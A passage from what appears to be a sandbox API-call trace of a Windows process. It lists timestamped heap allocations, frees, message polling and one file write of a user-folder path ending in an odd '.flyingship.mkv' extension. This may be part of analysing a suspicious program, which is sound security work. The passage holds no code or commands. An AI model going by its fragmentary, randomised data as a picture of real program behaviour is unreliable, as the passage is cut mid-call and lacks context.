lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0199.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0199.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0199.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.flyingship.mkv\r\n", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0199.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0199.207] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.flyingship.mkv\r\n", cchWideChar=80, lpMultiByteStr=0x9238c0, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\z58zBpaZzgTTH\\AGaY9D6lmIb.flyingship.mkv\r\n", lpUsedDefaultChar=0x0) returned 80 [0199.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0199.207] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0199.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0199.207] WriteFile (in: hFile=0x158, lpBuffer=0x923b28*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923b28*, lpNumberOfBytesWritten=0x87f43c*=0x4f, lpOverlapped=0x0) returned 1 [0199.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0199.207] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0199.208] CloseHandle (hObject=0x158) returned 1 [0199.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0199.208] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0199.209] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0199.209] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0199.209] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0199.210] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0199.210] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.210] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0199.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0199.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0199.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0199.210] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0199.210] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0199.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0199.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0199.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0199.211] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0199.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.211] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0199.211] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0199.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0199.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0199.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0199.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0199.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.212] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0199.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0199.212] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0199.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0199.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0199.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0199.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0199.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0199.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.213] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0199.213] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0199.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0199.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0199.214] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.214] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0199.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0199.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0199.215] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.215] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.215] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0199.216] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0199.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0199.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0199.217] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 